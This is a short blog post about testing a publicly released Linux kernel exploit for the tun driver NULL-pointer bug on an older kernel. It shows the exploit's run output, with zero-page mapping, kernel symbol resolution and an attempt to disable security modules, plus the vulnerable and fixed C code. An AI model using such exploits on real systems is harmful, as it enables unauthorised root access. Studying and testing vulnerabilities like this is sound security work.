Testing for The Recently Released Kernel Attack Code

Brad Spengler of grsecurity has released an exploit code for a Linux kernel vulnerability.

The exploit is confirmed in the latest Linux kernel code (version 2.6.30 and 2.6.30.1). And it only works when SELinux is enabled. It also works whenPulseAudio program is installed.

This exploit has been attracted a lot of attention lately. As can be seen by many news about it, such as coverage by The Register and SANS ISC Diary.

I want to know whether this exploit is working in the kernel < 2.6.30 . So I setup a test environment with kernel 2.6.25 with PulseAudio installed.

And here is the result :

./cheddar_bay.sh
pulseaudio: no process killed
[+] Personality set to: PER_SVR4
Pulseaudio is not suid root!

So I change the PulseAudio to suid root. Then I change the exploit code a little bit and try the exploit again :

./cheddar_bay.sh
pulseaudio: no process killed
[+] Personality set to: PER_SVR4
ALSA lib control.c:909:(snd_ctl_open_noupdate) Invalid CTL front:0
ALSA lib control.c:909:(snd_ctl_open_noupdate) Invalid CTL front:0
[+] MAPPED ZERO PAGE!
[+] Resolved tun_fops to 0xe1345e90
...
[+] Resolved nf_unregister_hooks to 0xc0296265
[+] Resolved security_ops to 0xc05313b0
[+] Resolved audit_enabled to 0xc05228e8
[+] *0xe1345ebc |= 1
[+] b00m!
[+] Disabled security of : nothing, what an insecure machine!
[+] Failed to get root :( Something's wrong.  Maybe the kernel isn't vulnerable?

Oops..something is not working. :(

According to SANS, the vulnerable code looks like this :

struct sock *sk = tun->sk;  // initialize sk with tun->sk

if (!tun)
return POLLERR;  // if tun is NULL return error

And the fixed code looks like :

struct sock *sk;
unsigned int mask = 0;

if (!tun)
return POLLERR;

sk = tun->sk;

What a tricky vulnerabilities !

About these ads

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s